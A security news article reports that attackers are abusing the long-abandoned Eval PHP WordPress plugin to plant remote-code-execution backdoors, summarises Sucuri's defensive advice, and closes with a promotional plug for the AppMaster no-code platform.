Cybersecurity researchers at GoDaddy-owned web security company Sucuri have discovered that an inactive but legitimate WordPress plugin, Eval PHP, is being exploited to compromise websites. Eval PHP was originally developed to allow users to add PHP code to articles and blog data, with its most recent update taking place roughly a decade ago. Since then, it has experienced negligible downloads for an extended period before witnessing a sudden surge in downloads in the past month, accumulating over 100,000 downloads with a peak of up to 7,000 downloads daily.
The Sucuri notice elaborates on the tactics employed by hackers utilizing Eval PHP. The code creates a PHP script in the website's docroot that features a specified remote code execution backdoor using the file_put_contents function. As the backdoor leverages the $_REQUEST[id] to acquire the executable PHP code, it can obtain the contents of $_GET, $_POST, and $_COOKIE, effectively hiding its parameters by appearing as cookies. Sucuri highlights that despite being less detectable than POST, GET is equally hazardous.
Additionally, Sucuri identifies that the hackers create backdoors across various draft posts, rendering them invisible to the public and more challenging to uncover compared to published pages. WordPress has yet to comment on their policy regarding abandoned plugins in response to TechRadar Pro's inquiries. Until then, Sucuri advises WordPress users to fortify their wp-admin panel and monitor activity diligently. The organization offers a four-step plan to improve security:
- Ensure your website remains updated and patched according to the latest security releases
- Implement two-factor authentication (2FA) or a similar access restriction measure for your admin panel
- Maintain regular website backups to safeguard against unforeseen incidents
- Utilize a web application firewall to protect against malicious bots and virtually patch known vulnerabilities
With the rising adoption of no-code and low-code platforms, developers and business leaders can construct web and mobile applications with ease, bypassing the complications of outdated plugins. One such solution is the AppMaster platform, an accessible and scalable no-code tool for creating backend, web, and mobile applications. AppMaster streamlines app development by negating technical debt and offering up-to-date solutions for businesses of all sizes.
For more detailed information on no-code and low-code app development, check out our comprehensive guide: Full Guide on No-Code, Low-Code App Development for 2022.